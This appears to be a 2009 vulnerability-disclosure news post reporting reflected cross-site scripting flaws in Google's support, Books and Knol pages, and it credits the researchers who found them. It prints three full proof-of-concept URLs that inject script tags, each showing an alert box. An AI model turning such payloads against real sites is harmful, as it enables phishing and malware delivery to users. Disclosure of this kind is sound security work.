 Google SSL page vulnerable to XSS
Written by DPWednesday, 6 May 2009 A security researcher who goes by the nickname "Black-Hacker", has submitted to the archive a critical XSS vulnerability affecting a Google SSL page.
This bug can be exploited by malicious users to conduct phishing attacks against Google users and also to infect them with malware, adware and spyware.
Google XSSed:
https://www.google.com/support/bin/answer.py?%22%3E%3C/script%3E%3Cscript%3Ealert(%22XSSed%22)%3C/script%3E=00000&hl=tr (still working at time of writing)
Mirror
Screenshot:
----------------------------------------------------------------------------
"HackSever" submitted another Google XSS on 20/04/2009:
http://books.google.com/books?q=%22%3B%3E%3C%2Fnoscript%3E%3Cscript%3Ealert(%27test%27)%3B%3C%2Fscript%3E&btnG=Kitaplar%C4%B1+Ara&hl=tr (now fixed)
Mirror
----------------------------------------------------------------------------
Azat Harutyunyan is also credited for this discovery (still working at time of writing):
http://knol.google.com/k/knol/system/knol/pages/SearchToolkit?show=off&q=%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
Mirror
----------------------------------------------------------------------------
It is a matter of seconds before Google Security Team fixes all of the above XSS vulns.
| 
